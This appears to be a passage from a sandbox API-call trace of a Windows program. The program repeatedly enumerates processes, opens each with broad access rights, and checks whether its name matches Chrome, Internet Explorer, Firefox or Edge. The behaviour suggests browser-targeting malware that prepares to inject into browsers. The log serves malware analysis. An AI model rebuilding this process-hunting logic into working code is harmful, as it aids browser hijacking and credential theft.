	[0215.517] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0215.518] CloseHandle (hObject=0x188) returned 1
	[0215.518] Sleep (dwMilliseconds=0x64) 
	[0215.625] GetCurrentProcessId () returned 0x110
	[0215.625] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x188
	[0215.629] Process32First (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0215.630] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0215.631] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0215.632] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x456c
	[0215.632] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.632] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0215.632] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.632] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.633] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.633] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0215.633] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.633] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.633] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0215.634] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x4570
	[0215.634] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.635] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0215.635] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.635] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.635] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.635] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0215.636] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.636] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.636] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0215.637] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x4574
	[0215.637] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.637] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0215.638] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.638] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.638] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.638] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0215.638] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.638] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.639] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0215.640] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x4578
	[0215.640] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.640] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0215.640] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.640] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.641] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.641] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0215.641] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.641] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.641] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0215.642] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x457c
	[0215.642] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.642] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0215.642] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.642] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.643] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.643] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0215.643] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.643] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.643] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0215.644] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x4580
	[0215.644] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.644] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0215.645] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.645] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.645] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.645] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0215.646] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.646] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.646] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0215.647] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x4584
	[0215.647] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.647] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0215.647] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.647] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.647] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.647] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0215.648] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.648] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.648] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0215.649] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x4588
	[0215.649] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.649] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0215.649] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.649] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.649] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.649] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0215.650] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.650] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.650] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0215.651] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x458c
	[0215.651] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.651] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0215.651] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.651] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.651] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.651] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0215.652] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.652] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.652] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0215.653] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x4590
	[0215.653] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.653] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0215.653] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.653] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.654] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.654] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0215.654] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.654] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.654] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0215.655] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x4594
	[0215.655] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.655] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0215.656] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.656] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.656] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.656] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0215.656] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.656] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.657] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0215.657] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x4598
	[0215.657] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.657] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0215.658] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.658] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.658] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.658] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0215.658] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.658] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.659] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0215.659] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x459c
	[0215.659] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.659] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0215.660] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.660] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.660] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.660] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0215.660] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.660] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.661] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0215.661] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x45a0
	[0215.661] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.662] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0215.662] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.662] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.662] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.662] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0215.663] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.663] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.663] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0215.663] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x45a4
	[0215.664] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.664] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0215.664] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.664] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.664] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.664] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0215.665] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.665] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.665] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0215.665] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x45a8
	[0215.666] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.666] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0215.666] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.666] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.666] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.666] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0215.667] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.667] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.667] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0215.667] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x45ac
	[0215.668] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.668] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0215.668] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.668] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.668] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.668] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0215.669] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.669] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.669] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0215.669] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x45b0
	[0215.670] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.670] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0215.670] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.670] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.670] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.670] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0215.672] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.672] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.672] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0215.673] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x45b4
	[0215.673] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.673] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0215.673] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.673] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.674] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.674] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0215.674] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.674] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.674] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0215.675] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x45b8
	[0215.675] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.675] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0215.675] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.675] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.676] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.676] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0215.676] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.676] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.676] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0215.677] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x45bc
	[0215.677] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.677] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0215.677] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.677] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.678] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.678] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0215.678] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.678] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.678] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0215.679] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x45c0
	[0215.679] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.679] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0215.679] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.679] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.680] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.680] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0215.680] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.680] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.680] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0215.681] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x45c4
	[0215.681] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.681] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0215.681] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.681] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.682] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.682] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0215.682] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.682] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.682] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0215.683] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x45c8
	[0215.683] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.683] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0215.683] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.683] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.684] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.684] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0215.684] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.684] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
